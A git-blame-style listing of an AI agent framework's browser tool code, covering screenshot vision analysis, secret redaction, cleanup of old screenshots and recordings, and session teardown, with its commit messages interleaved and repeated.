a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
screenshot_args ,
2026-01-29 06:10:24 +00:00
)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if not result . get ( " success " ) :
2026-03-08 19:31:23 -07:00
error_detail = result . get ( " error " , " Unknown error " )
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : False ,
2026-03-08 19:31:23 -07:00
" error " : f " Failed to take screenshot ( { mode } mode): { error_detail } "
2026-01-29 06:10:24 +00:00
} , ensure_ascii = False )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
actual_screenshot_path = result . get ( " data " , { } ) . get ( " path " )
if actual_screenshot_path :
screenshot_path = Path ( actual_screenshot_path )
2026-01-29 06:10:24 +00:00
# Check if screenshot file was created
if not screenshot_path . exists ( ) :
2026-03-17 00:16:34 -07:00
_cp = _get_cloud_provider ( )
mode = " local " if _cp is None else f " cloud ( { _cp . provider_name ( ) } ) "
2026-01-29 06:10:24 +00:00
return json . dumps ( {
" success " : False ,
2026-03-08 19:31:23 -07:00
" error " : (
f " Screenshot file was not created at { screenshot_path } ( { mode } mode). "
f " This may indicate a socket path issue (macOS /var/folders/), "
f " a missing Chromium install ( ' agent-browser install ' ), "
f " or a stale daemon process. "
) ,
2026-01-29 06:10:24 +00:00
} , ensure_ascii = False )
2026-03-14 11:34:31 -07:00
2026-04-11 11:07:18 -07:00
# Convert screenshot to base64 at full resolution.
_screenshot_bytes = screenshot_path . read_bytes ( )
_screenshot_b64 = base64 . b64encode ( _screenshot_bytes ) . decode ( " ascii " )
data_url = f " data:image/png;base64, { _screenshot_b64 } "
2026-03-14 11:34:31 -07:00
2026-02-22 02:16:11 -08:00
vision_prompt = (
f " You are analyzing a screenshot of a web browser. \n \n "
f " User ' s question: { question } \n \n "
f " Provide a detailed and helpful answer based on what you see in the screenshot. "
f " If there are interactive elements, describe them. If there are verification challenges "
f " or CAPTCHAs, describe what type they are and what action might be needed. "
f " Focus on answering the user ' s specific question. "
)
2026-01-29 06:10:24 +00:00
2026-03-11 20:52:19 -07:00
# Use the centralized LLM router
2026-03-08 19:54:32 -07:00
vision_model = _get_vision_model ( )
2026-03-11 20:52:19 -07:00
logger . debug ( " browser_vision: analysing screenshot ( %d bytes) " ,
2026-04-11 11:07:18 -07:00
len ( _screenshot_bytes ) )
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
2026-04-20 12:10:13 +05:30
# Read vision timeout/temperature from config (auxiliary.vision.*).
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
# Local vision models (llama.cpp, ollama) can take well over 30s for
2026-04-20 12:10:13 +05:30
# screenshot analysis, so the default timeout must be generous.
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
vision_timeout = 120.0
2026-04-20 12:10:13 +05:30
vision_temperature = 0.1
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
try :
from hermes_cli . config import load_config
_cfg = load_config ( )
2026-04-20 12:10:13 +05:30
_vision_cfg = _cfg . get ( " auxiliary " , { } ) . get ( " vision " , { } )
_vt = _vision_cfg . get ( " timeout " )
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
if _vt is not None :
vision_timeout = float ( _vt )
2026-04-20 12:10:13 +05:30
_vtemp = _vision_cfg . get ( " temperature " )
if _vtemp is not None :
vision_temperature = float ( _vtemp )
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
except Exception :
pass
2026-03-11 20:52:19 -07:00
call_kwargs = {
" task " : " vision " ,
" messages " : [
2026-02-22 02:16:11 -08:00
{
" role " : " user " ,
" content " : [
{ " type " : " text " , " text " : vision_prompt } ,
{ " type " : " image_url " , " image_url " : { " url " : data_url } } ,
2026-01-29 06:10:24 +00:00
] ,
2026-02-22 02:16:11 -08:00
}
] ,
2026-03-11 20:52:19 -07:00
" max_tokens " : 2000 ,
2026-04-20 12:10:13 +05:30
" temperature " : vision_temperature ,
fix: browser_vision ignores auxiliary.vision.timeout config (#2901)
* docs: unify hooks documentation — add plugin hooks to hooks page, add session:end event
The hooks page only documented gateway event hooks (HOOK.yaml system).
The plugins page listed plugin hooks (pre_tool_call, etc.) that weren't
referenced from the hooks page, which was confusing.
Changes:
- hooks.md: Add overview table showing both hook systems
- hooks.md: Add Plugin Hooks section with available hooks, callback
signatures, and example
- hooks.md: Add missing session:end gateway event (emitted but undocumented)
- hooks.md: Mark pre_llm_call, post_llm_call, on_session_start,
on_session_end as planned (defined in VALID_HOOKS but not yet invoked)
- hooks.md: Update info box to cross-reference plugin hooks
- hooks.md: Fix heading hierarchy (gateway content as subsections)
- plugins.md: Add cross-reference to hooks page for full details
- plugins.md: Mark planned hooks as (planned)
* fix: browser_vision ignores auxiliary.vision.timeout config
browser_vision called call_llm() without passing a timeout parameter,
so it always used the 30-second default in auxiliary_client.py. This
made vision analysis with local models (llama.cpp, ollama) impossible
since they typically need more than 30s for screenshot analysis.
Now browser_vision reads auxiliary.vision.timeout from config.yaml
(same config key that vision_analyze already uses) and passes it
through to call_llm().
Also bumped the default vision timeout from 30s to 120s in both
browser_vision and vision_analyze — 30s is too aggressive for local
models and the previous default silently failed for anyone running
vision locally.
Fixes user report from GamerGB1988.
2026-03-24 19:10:12 -07:00
" timeout " : vision_timeout ,
2026-03-11 20:52:19 -07:00
}
if vision_model :
call_kwargs [ " model " ] = vision_model
2026-04-11 11:07:18 -07:00
# Try full-size screenshot; on size-related rejection, downscale and retry.
try :
response = call_llm ( * * call_kwargs )
except Exception as _api_err :
from tools . vision_tools import (
_is_image_size_error , _resize_image_for_vision , _RESIZE_TARGET_BYTES ,
)
if ( _is_image_size_error ( _api_err )
and len ( data_url ) > _RESIZE_TARGET_BYTES ) :
logger . info (
" Vision API rejected screenshot ( %.1f MB); "
" auto-resizing to ~ %.0f MB and retrying... " ,
len ( data_url ) / ( 1024 * 1024 ) ,
_RESIZE_TARGET_BYTES / ( 1024 * 1024 ) ,
)
data_url = _resize_image_for_vision (
screenshot_path , mime_type = " image/png " )
call_kwargs [ " messages " ] [ 0 ] [ " content " ] [ 1 ] [ " image_url " ] [ " url " ] = data_url
response = call_llm ( * * call_kwargs )
else :
raise
2026-03-14 11:34:31 -07:00
2026-03-28 17:25:04 -07:00
analysis = ( response . choices [ 0 ] . message . content or " " ) . strip ( )
2026-04-01 02:08:58 +03:00
# Redact secrets the vision LLM may have read from the screenshot.
from agent . redact import redact_sensitive_text
analysis = redact_sensitive_text ( analysis )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
response_data = {
2026-02-22 02:16:11 -08:00
" success " : True ,
2026-03-28 17:25:04 -07:00
" analysis " : analysis or " Vision analysis returned no content. " ,
2026-03-07 22:57:05 -08:00
" screenshot_path " : str ( screenshot_path ) ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
}
# Include annotation data if annotated screenshot was taken
if annotate and result . get ( " data " , { } ) . get ( " annotations " ) :
response_data [ " annotations " ] = result [ " data " ] [ " annotations " ]
return json . dumps ( response_data , ensure_ascii = False )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-08 19:31:23 -07:00
# Keep the screenshot if it was captured successfully — the failure is
# in the LLM vision analysis, not the capture. Deleting a valid
# screenshot loses evidence the user might need. The 24-hour cleanup
# in _cleanup_old_screenshots prevents unbounded disk growth.
2026-03-08 19:54:32 -07:00
logger . warning ( " browser_vision failed: %s " , e , exc_info = True )
2026-03-14 11:34:31 -07:00
error_info = { " success " : False , " error " : f " Error during vision analysis: { str ( e ) } " }
2026-03-07 22:57:05 -08:00
if screenshot_path . exists ( ) :
2026-03-08 19:31:23 -07:00
error_info [ " screenshot_path " ] = str ( screenshot_path )
error_info [ " note " ] = " Screenshot was captured but vision analysis failed. You can still share it via MEDIA:<path>. "
return json . dumps ( error_info , ensure_ascii = False )
2026-03-07 22:57:05 -08:00
def _cleanup_old_screenshots ( screenshots_dir , max_age_hours = 24 ) :
2026-03-14 02:56:06 -07:00
""" Remove browser screenshots older than max_age_hours to prevent disk bloat.
Throttled to run at most once per hour per directory to avoid repeated
scans on screenshot - heavy workflows .
"""
key = str ( screenshots_dir )
now = time . time ( )
if now - _last_screenshot_cleanup_by_dir . get ( key , 0.0 ) < 3600 :
return
_last_screenshot_cleanup_by_dir [ key ] = now
2026-03-07 22:57:05 -08:00
try :
cutoff = time . time ( ) - ( max_age_hours * 3600 )
for f in screenshots_dir . glob ( " browser_screenshot_*.png " ) :
2026-01-29 06:10:24 +00:00
try :
2026-03-07 22:57:05 -08:00
if f . stat ( ) . st_mtime < cutoff :
f . unlink ( )
2026-03-10 06:59:20 -07:00
except Exception as e :
logger . debug ( " Failed to clean old screenshot %s : %s " , f , e )
except Exception as e :
logger . debug ( " Screenshot cleanup error (non-critical): %s " , e )
2026-01-29 06:10:24 +00:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
def _cleanup_old_recordings ( max_age_hours = 72 ) :
""" Remove browser recordings older than max_age_hours to prevent disk bloat. """
try :
2026-04-03 12:32:10 -07:00
hermes_home = get_hermes_home ( )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
recordings_dir = hermes_home / " browser_recordings "
if not recordings_dir . exists ( ) :
return
cutoff = time . time ( ) - ( max_age_hours * 3600 )
for f in recordings_dir . glob ( " session_*.webm " ) :
try :
if f . stat ( ) . st_mtime < cutoff :
f . unlink ( )
2026-03-10 06:59:20 -07:00
except Exception as e :
logger . debug ( " Failed to clean old recording %s : %s " , f , e )
except Exception as e :
logger . debug ( " Recording cleanup error (non-critical): %s " , e )
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
2026-01-29 06:10:24 +00:00
# ============================================================================
# Cleanup and Management Functions
# ============================================================================
def cleanup_browser ( task_id : Optional [ str ] = None ) - > None :
"""
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
Clean up browser session ( s ) for a task .
2026-01-31 21:42:15 -08:00
Called automatically when a task completes or when inactivity timeout is reached .
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
